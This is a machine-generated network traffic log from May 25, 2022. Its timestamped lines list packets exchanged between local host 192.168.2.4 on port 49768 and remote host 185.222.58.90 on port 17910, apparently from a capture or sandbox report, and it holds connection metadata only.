May 25, 2022 15:08:09.818628073 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818641901 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818773031 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818799973 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818824053 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818836927 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818871021 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818897963 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818916082 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818923950 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818950891 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818964958 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818977118 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818984032 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818994045 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819008112 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819017887 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819161892 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819192886 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819210052 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819262981 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819292068 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819318056 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819344044 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819360018 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819371939 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819376945 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819386959 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819397926 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819399118 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819423914 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819443941 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819469929 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819513083 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819623947 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819653034 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819677114 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819678068 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819699049 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819706917 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819717884 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819734097 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819753885 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819761038 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819762945 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819777966 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819792986 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819816113 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819832087 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819863081 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819865942 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819895029 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819910049 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819921017 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819925070 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.819948912 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.819976091 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.820019960 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.820132971 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.820163012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.820188046 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.820192099 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.820208073 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.820229053 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.835773945 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.835805893 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.835834026 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.835916996 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.835946083 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.835972071 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.836071014 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.836098909 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.837866068 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.837896109 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.837954044 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.838021040 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.838061094 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.839586020 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.839660883 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.839713097 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.839797974 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.839859962 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.839922905 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.840059996 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840087891 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840112925 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840168953 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.840188026 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840214968 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840286970 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840359926 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840406895 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.840590000 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840648890 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.840867996 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.840929985 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.841111898 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.841159105 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.841408968 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.841439009 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.841470957 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.841490984 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.841751099 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.841806889 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.841928959 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.842016935 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.842160940 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.842215061 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.842436075 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.842499018 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.842684984 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.842753887 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.842761040 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.842807055 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.842916012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.842946053 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.842974901 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.843281984 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.843354940 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.843415976 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.843487024 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.843621969 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.843687057 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.843696117 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.843743086 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.843894005 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.843967915 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.843995094 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.844034910 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.844053030 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.844151974 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.844213963 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.860335112 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.860445023 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.862346888 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.862379074 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.862406015 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.862427950 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.862437010 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.862451077 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.862464905 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.862493992 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.862646103 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.862844944 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.863080978 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.863425016 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.863845110 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.864330053 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.864604950 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.864840984 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865120888 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865329027 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865358114 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865386009 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865411043 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865438938 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865643978 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.865842104 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.866121054 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.866367102 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.866683006 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.866710901 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.866882086 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.882822037 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.884928942 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.885166883 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.885262966 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.903961897 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.907778978 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.907825947 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.908066988 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.908083916 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.908097029 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.908154011 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.908253908 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.908538103 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.908669949 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.908746004 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.908849955 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.909018993 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.909106016 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.909266949 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.909359932 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.909470081 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.909612894 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.909756899 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.909842014 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.930660009 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.930799007 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.930933952 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.930977106 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.931154966 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.931235075 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.931298971 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.931343079 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.931487083 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.931590080 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.931731939 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.931823015 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.932133913 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.932233095 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.932297945 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.932393074 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.932529926 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.932630062 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.932801962 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.932893038 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.948250055 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.948318958 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.948451042 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.953429937 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.953541994 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.953619957 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.953669071 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.953751087 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.953906059 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.954041958 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.954130888 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.954355001 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.954436064 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.954642057 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.954726934 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.954833031 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.954895973 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.955080032 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.955161095 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.955308914 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.955514908 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.955678940 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.955877066 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.955931902 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.955955029 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.956082106 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.956170082 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.956245899 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.956275940 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.956300974 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.956614017 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.976128101 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.976382971 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.976417065 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.976509094 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.976785898 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.976859093 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.976871967 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.976938009 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.977016926 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.977083921 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.977266073 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.977351904 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.977507114 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.977581978 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.977746964 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.977849960 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.978054047 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.978135109 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.978259087 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.978329897 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.978585005 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.978663921 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.978774071 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.978842020 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.979057074 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.979134083 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.998900890 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.999002934 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.999072075 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.999238014 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.999350071 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.999387980 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.999694109 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.999789000 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.000662088 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.000783920 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.001091957 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.001215935 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.001250982 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.001349926 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.001538038 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.001627922 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.021786928 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.021914959 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.022016048 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.022068977 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.022089958 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.022183895 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.022464037 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.022558928 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.023224115 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.023318052 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.023523092 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.023552895 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.023602009 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.023672104 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.023734093 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.023998022 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024079084 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.024095058 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024123907 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024152040 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024178982 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.024180889 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024188995 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.024209023 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024238110 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024514914 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024766922 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024844885 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024871111 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024969101 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.024996996 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.025022984 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.025120974 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.044723988 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.044770956 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.044799089 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.046665907 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.046710968 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.046737909 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.047267914 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.047298908 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.047327042 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.047420025 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.047615051 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.047976017 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.070766926 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.070816994 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.070993900 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.071214914 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.071362019 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.071588039 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.071690083 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.071913958 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.071999073 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.072285891 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.072357893 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.093715906 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.093940020 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.093966961 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.094146013 CEST	49768	17910	192.168.2.4	185.222.58.90
